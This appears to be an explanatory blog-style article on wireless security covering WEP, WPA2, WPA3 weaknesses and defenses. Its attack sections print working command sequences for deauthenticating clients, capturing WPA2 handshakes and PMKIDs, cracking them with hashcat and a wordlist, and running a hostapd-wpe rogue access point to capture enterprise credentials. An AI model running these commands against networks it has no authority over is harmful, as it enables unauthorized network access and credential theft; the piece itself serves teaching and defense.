Wireless security has evolved significantly over the past decade, but the attacks that work in 2026 are often the same ones that worked in 2016 — because the infrastructure hasn’t kept up with the protocols. Understanding what’s actually being exploited versus what the spec says should be secure is the useful frame.
The Protocol Stack
WEP is dead. It was broken in 2001 and can be cracked in under a minute with commodity hardware. If you’re still running WEP on anything, stop.
WPA2-Personal (PSK) remains the most common home and small business configuration. The attack surface:
- The 4-way handshake captured during authentication can be taken offline and cracked against a wordlist
- PMKID attacks allow capturing crackable material without waiting for a client to connect
- Default router passwords are often weak and well-documented
WPA2-Enterprise uses 802.1X authentication with a RADIUS server. Individual users authenticate with credentials rather than a shared key. Significantly harder to attack directly — the main vectors are rogue AP attacks (setting up a fake AP that accepts connections and captures credentials) and weak EAP configurations.
WPA3 introduced Simultaneous Authentication of Equals (SAE), which replaces the PSK handshake and resists offline dictionary attacks. Side-channel attacks against early implementations existed, but patched. WPA3 is genuinely more secure, but transition mode (supporting both WPA2 and WPA3 clients) reintroduces some WPA2 vulnerabilities. Full WPA3-only networks are more defensible.
The Practical Attack Landscape
WPA2 Handshake Capture and Crack
The most common attack against WPA2 personal networks:
# Put interface in monitor mode
airmon-ng start wlan0
airodump-ng wlan0mon
airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon
aireplay-ng -0 1 -a AA:BB:CC:DD:EE:FF -c CLIENT_MAC wlan0mon
aircrack-ng capture-01.cap -w rockyou.txt
hcxpcapngtool -o hash.hc22000 capture-01.cap
hashcat -a 0 -m 22000 hash.hc22000 rockyou.txt
The crack succeeds based entirely on whether the PSK is in the wordlist. A strong random passphrase — 20+ characters — is not crackable with dictionary attacks even on fast hardware.
PMKID Attack
Doesn’t require a connected client — you can capture crackable material just from the access point:
# hcxdumptool captures PMKID without waiting for handshake
hcxdumptool -i wlan0mon -o capture.pcapng --enable_status=1
hcxpcapngtool -o hash.hc22000 capture.pcapng
hashcat -a 0 -m 22000 hash.hc22000 rockyou.txt
Evil Twin / Rogue AP
A rogue access point with the same SSID as a legitimate network. When clients connect — either automatically or because the attacker deauthenticates them from the real AP — they send credentials or traffic to the attacker.
Against WPA2-Enterprise, this attack can capture EAP credentials (usernames and NTLMv2 hashes) if the client isn’t configured to verify the server certificate. Hostapd-wpe automates this:
# Rogue AP that captures WPA2-Enterprise credentials
hostapd-wpe hostapd-wpe.conf
The captured NTLMv2 hashes can then be cracked offline or relayed.
Defense
For home/personal:
- Use WPA3 if your hardware supports it
- Set a strong random PSK — 20+ random characters, not a passphrase you’ll remember
- Disable WPS entirely (WPS PIN attacks remain viable)
- Segment IoT devices onto a guest network
For enterprise:
- WPA2/WPA3-Enterprise with certificate validation enforced on clients
- RADIUS server that logs authentication attempts
- Rogue AP detection (wireless IDS)
- Client certificates rather than username/password for EAP where possible
The persistent problem: Most people’s routers still have default or weak PSKs. The ISP-provided router with the password on a sticker is more vulnerable than the protocol implies, because that sticker password is often predictable.